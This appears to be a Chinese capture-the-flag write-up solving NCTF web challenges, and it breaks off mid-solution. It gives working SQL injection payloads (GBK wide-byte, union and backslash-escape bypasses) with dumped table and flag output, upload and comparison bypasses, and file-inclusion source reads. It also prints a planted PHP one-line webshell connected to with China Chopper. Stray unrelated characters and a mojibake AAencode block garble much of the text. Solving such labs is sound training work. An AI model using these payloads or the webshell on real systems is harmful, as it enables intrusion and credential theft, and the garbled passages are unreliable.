include("secret.php");
?>
<html>
    <head>
        <title>The Ducks</title>
        <link  rel="stylesheet" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
    </head>
    <body>
        <div class="container">
            <div class="jumbotron">
                <center>
                    <h1>The Ducks</h1>
                    <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?></code>
                            </div>
                        <?php } ?>
                    <?php } ?>
                    <form action="." method="POST">
                        <div class="row">
                            <div class="col-md-6 col-md-offset-3">
                                <div class="row">
                                    <div class="col-md-9">
                                        <input type="password" class="form-control" name="pass" placeholder="Password" />
                                    </div>
                                    <div class="col-md-3">
                                        <input type="submit" class="btn btn-primary" value="Submit" />
                                    </div>
                                </div>
                            </div>
                        </div>
                    </form>
                </center>
            </div>
            <p>
                <center>
                    source at <a href="source.php" target="_blank">/source.php</a>
                </center>
            </p>
        </div>
    </body>
</html>

關(guān)鍵信息：

 <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?>

extract() 函數(shù)從數(shù)組中將變量導(dǎo)入到當(dāng)前的符號(hào)表煮岁。
1.該函數(shù)使用數(shù)組鍵名作為變量名，使用數(shù)組鍵值作為變量值涣易。針對(duì)數(shù)組中的每個(gè)元素画机，將在當(dāng)前符號(hào)表中創(chuàng)建對(duì)應(yīng)的一個(gè)變量。
2.由于extrac()的參數(shù)是POST新症，則post一個(gè)參數(shù)thepassword_123覆蓋掉默認(rèn)的thepassword_123步氏，并且令post的pass=thepassword_123。
nctf{bian_liang_fu_gai!}

上傳繞過

題目地址：猜猜代碼怎么寫的

上傳文件繞過類型徒爹，打開Burpsuite荚醒，上傳一個(gè)文件試試：

1. filename=1.png
2. uppath=/uploads/1.png

上傳一個(gè)php吧

1. filename=download.php
2. uppath=/uploads/download.php

分析：
1.上傳的文件后綴即是php又是jpg，png瀑焦，gif腌且。
2.代碼對(duì)兩處進(jìn)行了匹配：

1. filename
2. 上傳路徑：/uploads/

我們來看一下path是怎么構(gòu)成的，修改一下path和filename看看：

1. filename=download.jpg
2. uppath=/uploads/dowload.phpdownload.jpg
3. upfilename=path & filename

利用0X00截?cái)?關(guān)于截?cái)嗌蟼骺梢詤⒖催@篇文章榛瓮，將download.php后面的download.jpg截?cái)?
uppath=/uploads/download.phpchr(0)download.jpg
nctf{welcome_to_hacks_world}

起名字真難

地址：代碼如下

<?php
 function noother_says_correct($number)
{
        $one = ord('1');
        $nine = ord('9');
        for ($i = 0; $i < strlen($number); $i++)
        {   
                $digit = ord($number{$i});
                if ( ($digit >= $one) && ($digit <= $nine) )
                {
                        return false;
                }
        }
           return $number == '54975581388';
}
$flag='*******';
if(noother_says_correct($_GET['key']))
    echo $flag;
else 
    echo 'access denied';
?>

分析：
1.要使noother_says_correct($_GET['key'])為真
2.則 $number == '54975581388'成立铺董，返回True
3.而前面代碼又檢測$number不能是1-9的數(shù)字
利用==特性
54975581388十六進(jìn)制是ccccccccc
http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
The flag is:nctf{follow_your_dream}
nctf{follow_your_dream}

sql injection 3

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

寬字節(jié)注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1'

your sql:select id,title from news where id = '1\''
Hello World!OVO

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df'

your sql:select id,title from news where id = '1運(yùn)''

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1 -- -

your sql:select id,title from news where id = '1運(yùn)' and 1=1 -- -'
Hello World!OVO

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 -- -

your sql:select id,title from news where id = '1運(yùn)' and 1=2 -- -'

很好，可以注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2 -- -

your sql:select id,title from news where id = '1運(yùn)' order by 2 -- -'
Hello World!OVO

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,2 -- -

your sql:select id,title from news where id = '1運(yùn)' and 1=2 union select 1,2 -- -'
2

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -

your sql:select id,title from news where id = '1運(yùn)' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -'
sae-chinalover@220.181.129.119|sae-chinalover|5.5.52-0ubuntu0.14.04.1

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sae-chinalover'-- -

your sql:select id,title from news where id = '1運(yùn)' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=\'sae-chinalover\'-- -'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10

單引號(hào)‘’被轉(zhuǎn)義了

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -

sae-chinalover十六進(jìn)制是0x7361652d6368696e616c6f766572禀晓，用十六進(jìn)制來繞過字符轉(zhuǎn)義

your sql:select id,title from news where id = '1運(yùn)' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -'
ctf,ctf2,ctf3,ctf4,news

在ctf2中找到flag

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -

your sql:select id,title from news where id = '1運(yùn)' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -'
id,content

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(id,content) from ctf2-- -

your sql:select id,title from news where id = '1運(yùn)' and 1=2 union select 1,group_concat(id,content) from ctf2-- -'
1020no msg in 1020,1021no msg in 1021 too,1022no msg in 1022,1023no msg in 1023~~~,1024the flag is:nctf{query_in_mysql},1025no more

nctf{query_in_mysql}
這題好像炸了精续，看了別人的writeup發(fā)現(xiàn)鏈接不同，考點(diǎn)依然是寬字節(jié)注入粹懒，nctf{gbk_3sqli}重付。

密碼重置

重置管理員賬號(hào)：admin 的密碼

你在點(diǎn)擊忘記密碼之后你的郵箱收到了這么一封重置密碼的郵件：

點(diǎn)擊此鏈接重置您的密碼

http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg==
Y3RmdXNlcg==是base64加密的ctfuser
修改user=admin,和url的user1=base64(admin)即可
nctf{reset_password_often_have_vuln}

sql injection 4

繼續(xù)注入吧~
題目地址

TIP:反斜杠可以用來轉(zhuǎn)義
仔細(xì)查看相關(guān)函數(shù)的用法

查看源碼

<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

echo $flag;
-->
Invalid password!

sql語句
SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';
等價(jià)于：
SELECT * FROM users WHERE name=' $username' AND pass='$password';
SQL語句單引號(hào)類型
1.添加一個(gè)單引號(hào)來閉合第一個(gè)單引號(hào)，因?yàn)榍懊嬗衧tripslashes轉(zhuǎn)義了凫乖，所以這個(gè)方法不行确垫。
http://chinalover.sinaapp.com/web15/index.php?username=admin' or 1=1 1-- - &password=123
2.通過\轉(zhuǎn)義將第二個(gè)引號(hào)省略掉：
http://chinalover.sinaapp.com/web15/index.php?username=admin&password= or 1=1 -- -
sql語句變成：
SELECT * FROM users WHERE name=' admin\' AND pass= ' or 1=1 -- -';
刷新flag出現(xiàn)：flag:nctf{sql_injection_is_interesting}
nctf{sql_injection_is_interesting}

你從哪里來

你是從 google 來的嗎？
傳送門：題目地址

按道理修改referer === "https://www.google.com/就可以帽芽，但是好像網(wǎng)站炸了删掀，看了源碼確實(shí)是這樣做。

<?php
$referer = $_SERVER['referer'];
if ($referer === "https://www.google.com/ " || $referer === "https://www.google.com"){
    echo "nctf{http_referer}";
}else{
    echo "are you from google?";
}
?>

AAencode

javascript aaencode

傳送門：題目地址

打開鏈接發(fā)現(xiàn)是這樣的亂碼导街，不知道怎么回事披泪，不應(yīng)該啊。
錁熛夛緹錁?= /锝€锝嵚達(dá)級(jí)錁? ~鈹燴攣鈹? //*麓鈭囷絸*/ ['_']; o=(錁燂槳錁?) =_=3; c=(錁熚橈緹) =(錁燂槳錁?)-(錁燂槳錁?); (錁熜旓緹) =(錁熚橈緹)= (o^_^o)/ (o^_^o);(錁熜旓緹)={錁熚橈緹: '_' ,錁熛夛緹錁? : ((蠅錁燂緣==3) +'_') [錁熚橈緹] ,錁燂槳錁燂緣 :(錁熛夛緹錁?+ '_')[o^_^o -(錁熚橈緹)] ,錁熜旓緹錁?:((錁燂槳錁?==3) +'_')[錁燂槳錁焆 }; (錁熜旓緹) [錁熚橈緹] =((錁熛夛緹錁?==3) +'_') [c^_^o];(錁熜旓緹) ['c'] = ((錁熜旓緹)+'_') [ (錁燂槳錁?)+(錁燂槳錁?)-(錁熚橈緹) ];(錁熜旓緹) ['o'] = ((錁熜旓緹)+'_') [錁熚橈緹];(錁無錁?)=(錁熜旓緹) ['c']+(錁熜旓緹) ['o']+(錁熛夛緹錁? +'_')[錁熚橈緹]+ ((錁熛夛緹錁?==3) +'_') [錁燂槳錁焆 + ((錁熜旓緹) +'_') [(錁燂槳錁?)+(錁燂槳錁?)]+ ((錁燂槳錁?==3) +'_') [錁熚橈緹]+((錁燂槳錁?==3) +'_') [(錁燂槳錁?) - (錁熚橈緹)]+(錁熜旓緹) ['c']+((錁熜旓緹)+'_') [(錁燂槳錁?)+(錁燂槳錁?)]+ (錁熜旓緹) ['o']+((錁燂槳錁?==3) +'_') [錁熚橈緹];(錁熜旓緹) ['_'] =(o^_^o) [錁無錁焆 [錁無錁焆;(錁熚碉緹)=((錁燂槳錁?==3) +'_') [錁熚橈緹]+ (錁熜旓緹) .錁熜旓緹錁?+((錁熜旓緹)+'_') [(錁燂槳錁?) + (錁燂槳錁?)]+((錁燂槳錁?==3) +'_') [o^_^o -錁熚橈緹]+((錁燂槳錁?==3) +'_') [錁熚橈緹]+ (錁熛夛緹錁? +'_') [錁熚橈緹]; (錁燂槳錁?)+=(錁熚橈緹); (錁熜旓緹)[錁熚碉緹]='\\'; (錁熜旓緹).錁熚橈緹錁?=(錁熜旓緹+ 錁燂槳錁?)[o^_^o -(錁熚橈緹)];(o錁燂槳錁無)=(錁熛夛緹錁? +'_')[c^_^o];(錁熜旓緹) [錁無錁焆='\"';(錁熜旓緹) ['_'] ( (錁熜旓緹) ['_'] (錁熚碉緹+(錁熜旓緹)[錁無錁焆+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (錁熚橈緹)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((錁燂槳錁?) + (錁熚橈緹))+ (錁燂槳錁?)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ ((錁燂槳錁?) + (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((o^_^o) +(o^_^o))+ (錁燂槳錁?)+ (錁熜旓緹)[錁熚碉緹]+((錁燂槳錁?) + (錁熚橈緹))+ (c^_^o)+ (錁熜旓緹)[錁熚碉緹]+(錁燂槳錁?)+ ((o^_^o) - (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((錁燂槳錁?) + (錁熚橈緹))+ ((o^_^o) +(o^_^o))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (o^_^o)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((o^_^o) +(o^_^o))+ (錁燂槳錁?)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ ((o^_^o) +(o^_^o))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((錁燂槳錁?) + (o^_^o))+ (o^_^o)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((錁燂槳錁?) + (錁熚橈緹))+ ((o^_^o) - (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (錁熚橈緹)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (錁熚橈緹)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (o^_^o)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((錁燂槳錁?) + (錁熚橈緹))+ (錁熚橈緹)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((o^_^o) +(o^_^o))+ (錁燂槳錁?)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (o^_^o)+ ((錁燂槳錁?) + (o^_^o))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (錁熚橈緹)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (錁熚橈緹)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ ((錁燂槳錁?) + (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((錁燂槳錁?) + (錁熚橈緹))+ ((o^_^o) +(o^_^o))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (o^_^o)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((錁燂槳錁?) + (錁熚橈緹))+ ((錁燂槳錁?) + (o^_^o))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ (錁燂槳錁?)+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ (錁燂槳錁?)+ ((錁燂槳錁?) + (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+(錁熚橈緹)+ ((錁燂槳錁?) + (o^_^o))+ ((錁燂槳錁?) + (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+(錁燂槳錁?)+ ((o^_^o) - (錁熚橈緹))+ (錁熜旓緹)[錁熚碉緹]+((錁燂槳錁?) + (錁熚橈緹))+ (錁熚橈緹)+ (錁熜旓緹)[錁無錁焆) (錁熚橈緹)) ('_');
看了源碼,確實(shí)不應(yīng)該這樣搬瑰，這樣的AAencode直接在控制臺(tái)運(yùn)行就可以款票。
?ω??= /｀ｍ′）? ~┻━┻ //*′?｀*/ ['_']; o=(???) =_=3; c=(?Θ?) =(???)-(???); (?Д?) =(?Θ?)= (o^_^o)/ (o^_^o);(?Д?)={?Θ?: '_' ,?ω?? : ((?ω??==3) +'_') [?Θ?] ,???? :(?ω??+ '_')[o^_^o -(?Θ?)] ,?Д??:((???==3) +'_')[???] }; (?Д?) [?Θ?] =((?ω??==3) +'_') [c^_^o];(?Д?) ['c'] = ((?Д?)+'_') [ (???)+(???)-(?Θ?) ];(?Д?) ['o'] = ((?Д?)+'_') [?Θ?];(?o?)=(?Д?) ['c']+(?Д?) ['o']+(?ω?? +'_')[?Θ?]+ ((?ω??==3) +'_') [???] + ((?Д?) +'_') [(???)+(???)]+ ((???==3) +'_') [?Θ?]+((???==3) +'_') [(???) - (?Θ?)]+(?Д?) ['c']+((?Д?)+'_') [(???)+(???)]+ (?Д?) ['o']+((???==3) +'_') [?Θ?];(?Д?) ['_'] =(o^_^o) [?o?] [?o?];(?ε?)=((???==3) +'_') [?Θ?]+ (?Д?) .?Д??+((?Д?)+'_') [(???) + (???)]+((???==3) +'_') [o^_^o -?Θ?]+((???==3) +'_') [?Θ?]+ (?ω?? +'_') [?Θ?]; (???)+=(?Θ?); (?Д?)[?ε?]='\\'; (?Д?).?Θ??=(?Д?+ ???)[o^_^o -(?Θ?)];(o???o)=(?ω?? +'_')[c^_^o];(?Д?) [?o?]='\"';(?Д?) ['_'] ( (?Д?) ['_'] (?ε?+(?Д?)[?o?]+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?o?]) (?Θ?)) ('_');
nctf{javascript_aaencode}

php 反序列化

http://115.28.150.176/php1/index.php
代碼：

<?php
class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}
?>

這題不會(huì)哈哈哈控硼，太菜了。

SQL注入2

注入第二題~~主要考察union查詢
傳送門:點(diǎn)我?guī)泔w

Source:

<html>
<head>
Secure Web Login II
</head>
<body>

<?php
if($_POST[user] && $_POST[pass]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>


<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>

關(guān)鍵語句：

1.  $pass = md5($_POST[pass]);
2.  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
3.  strcasecmp():如果兩者相等艾少，返回 0卡乾。

我們可以自己select一個(gè)password返回給 $query:
select pw from ctf where user='$user' and 0=1 union select md5(123) -- -

1. and 0=1使前面的select pw from ctf where user='$user'為假，返回空姆钉。
2. 整個(gè)語句就返回md5(123)給$query
3. 這樣就繞開了查詢數(shù)據(jù)庫说订，直接我們賦值給$query

ntcf{union_select_is_wtf}

綜合題2

非xss題但是歡迎留言~
地址：get the flag

點(diǎn)擊最下面的本CMS說明：
http://cms.nuptzj.cn/about.php?file=sm.txt
顯示：
很明顯，這是安裝后留下來忘刪除的文件潮瓶。陶冷。。至于鏈接會(huì)出現(xiàn)在主頁上毯辅，這就要問管理員了埂伦。。思恐。 ===============================華麗的分割線============================= 本CMS由Funny公司開發(fā)的公司留言板系統(tǒng)沾谜，據(jù)本技術(shù)總監(jiān)說，此CMS采用國際頂級(jí)的技術(shù)所開發(fā)胀莹，安全性和實(shí)用性杠杠滴~</br> 以下是本CMS各文件的功能說明（由于程序猿偷懶基跑，只列了部分文件） config.php：存放數(shù)據(jù)庫信息，移植此CMS時(shí)要修改 index.php：主頁文件 passencode.php：Funny公司自寫密碼加密算法庫 say.php：用于接收和處理用戶留言請(qǐng)求 sm.txt：本CMS的說明文檔 sae的information_schema表好像沒法檢索描焰，我在這里給出admin表結(jié)構(gòu) create table admin ( id integer, username text, userpass text, ) ======================================================================== 下面是正經(jīng)的：本滲透測試平臺(tái)由：三只小潴(root#zcnhonker.net)& 冷愛(hh250@qq.com)開發(fā).由你們周老大我辛苦修改媳否，不能題目都被AK嘛，你們說是不是荆秦。所以這一題篱竭。。你們做出來也算你們吊咯步绸。
看url顯然是一個(gè)文件包含掺逼，那么用來看看about.php的源碼吧：

1. 可以用php://filter
2. 這個(gè)file參數(shù)就是用來查看源碼的，可以直接file=about.php查看

about.php源碼：

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<?php 
$file=$_GET['file']; 
if($file=="" || strstr($file,'config.php')){
 echo "file參數(shù)不能為空瓤介！"; 
exit(); 
}
else{ 
$cut=strchr($file,"loginxlcteam");
 if($cut==false){ 
$data=file_get_contents($file); 
$date=htmlspecialchars($data); 
echo $date; 
}
else{ 
echo "<script>alert('敏感目錄吕喘，禁止查看！但是刑桑。兽泄。。')
</script>"; } 
}

file=loginxlcteam可能是登陸頁面
函數(shù)解析：

1. strstr() 函數(shù)搜索字符串在另一字符串中的第一次出現(xiàn)漾月。如果未找到所搜索的字符串，則返回 FALSE胃珍。
2. strchr() 函數(shù)是 strstr() 函數(shù)的別名梁肿。
3. (a): file=config.php或者空蜓陌，就返回"file參數(shù)不能為空！"
   (b): file=loginxlcteam吩蔑，返回"敏感目錄钮热，禁止查看！但是烛芬。隧期。。"

結(jié)論就是about.php就是一個(gè)用來都網(wǎng)頁源碼的網(wǎng)址赘娄。
思路：

1.搜索欄可以SQL注入,拿管理員賬號(hào)密碼
2.getshell

1. SQL注入

查看 http://cms.nuptzj.cn/about.php/?file=so.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>搜索留言</title> 
</head> 
<body> 
<center> 
<div id="say" name="say" align="left" style="width:1024px"> 
<?php 
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){ 
echo '萬惡滴黑闊仆潮，本功能只有用本公司開發(fā)的瀏覽器才可以用喔~'; 
exit(); 
} 
$id=$_POST['soid']; 
include 'config.php'; 
include 'antiinject.php'; 
include 'antixss.php'; 
$id=antiinject($id); 
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能連接到數(shù)據(jù)庫！遣臼！".mysql_error()); 
mysql_select_db($db_name,$con); 
$id=mysql_real_escape_string($id); 
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result); 
echo htmlspecialchars($rs['nice']).':<br />&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />';
mysql_free_result($result); 
mysql_free_result($file); 
mysql_close($con); 
?> 
</div> 
</center> 
</body> 
</html>

Modefy headers修改user agent=Xlcteam Browser
查看 http://cms.nuptzj.cn/about.php/?file=antiinject.php

<?php 
function antiinject($content){ 
$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","="); 
$info=strtolower($content); 
for($i=0;$i<=count($keyword);$i++){ 
$info=str_replace($keyword[$i], '',$info); 
} 
return $info; } 
?>

繞過blacklist性置，這里和[AceBear CTF 2018] Web-urlparameter里的$_SERVER["REQUEST_URI"]類型不同：
1.這里是post方法，Urlparameter是get方法揍堰。
2.這里不能像urlparameter一樣直接改url鹏浅。
采用Insert Double Write繞過，注釋符/* */代替空格
注入過程：

1. soid=2/**/oorroorrderder/**/by/**/4
2. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,2,3,4
或：soid=0/**/uunionnion/**/sselectelect/**/1,2,3,4
3. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,concat_ws(0x7c,id,usernnameame,userppassass),3,4/**/ffromrom/**/aadmindmin

得到：1|admin|102 117 99 107 114 117 110 116 117

密碼102 117 99 107 114 117 110 116 117ASCII轉(zhuǎn)碼為fuckruntu
通過御劍掃到后臺(tái)登陸頁面屏歹，發(fā)現(xiàn)不對(duì)隐砸，其實(shí)是之前about.php源碼有給出login頁面：file=loginxlcteam
http://cms.nuptzj.cn/loginxlcteam

2. 開始登陸, Getshell

繼續(xù)利用about.php查看xlcteam.php源碼：http://cms.nuptzj.cn/about.php?file=xlcteam.php
<?php $e = $_REQUEST['www']; $arr = array($_POST['wtf'] => '|.*|e',); array_walk($arr, $e, ''); ?>
連接菜刀，此類一句話木馬連接方式參考文章蝙眶，password=wtf
http://cms.nuptzj.cn/xlcteam.php?www=preg_replace
nctf{you_are_s0_g00d_hacker}

密碼重置2

題題被秒季希，當(dāng)時(shí)我就不樂意了！
本題來源于CUMT
題目鏈接

TIPS:
1.管理員郵箱觀察一下就可以找到
2.linux下一般使用vi編輯器械馆，并且異常退出會(huì)留下備份文件
3.弱類型bypass

查看源碼找到郵箱:admin@nuptzj.cn

<pre id="line1"><!DOCTYPE html>  
<html>  <head>  
<meta charset="utf-8" />  
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />  
<meta name="renderer" content="webkit" />  
<meta name="admin" content="admin@nuptzj.cn" />  
<meta name="editor" content="Vim" />  
<title>logic</title>  
<style type="text/css"> body,html{
            position: relative;
            height: 100%;
            width: 100%;
            padding: 0;
            margin: 0;
            background-color: #272822;
            color: #fff;
        }
        form{
            position: absolute;
            top: 50%;
            left: 50%;
            width: 400px;
            margin: -70px -200px;
        }
        form input{
            display: block;
            margin: 10px auto;
            width: 100%;
            border: none;
            height: 2rem;
            border-radius: 5px;
        } </style>  </head>  <body>  
<form action="[submit.php](view-source:http://nctf.nuptzj.cn/web14/submit.php)" method="GET">  
<h1>找回管理員密碼</h1> email:<input name="emailAddress" type="text" />
</br> token:<input name="token" type="text" />
</br>  <input type="submit" value="提交">  
</form>  </body>  </html>  </pre>

嘗試找到.swp文件：

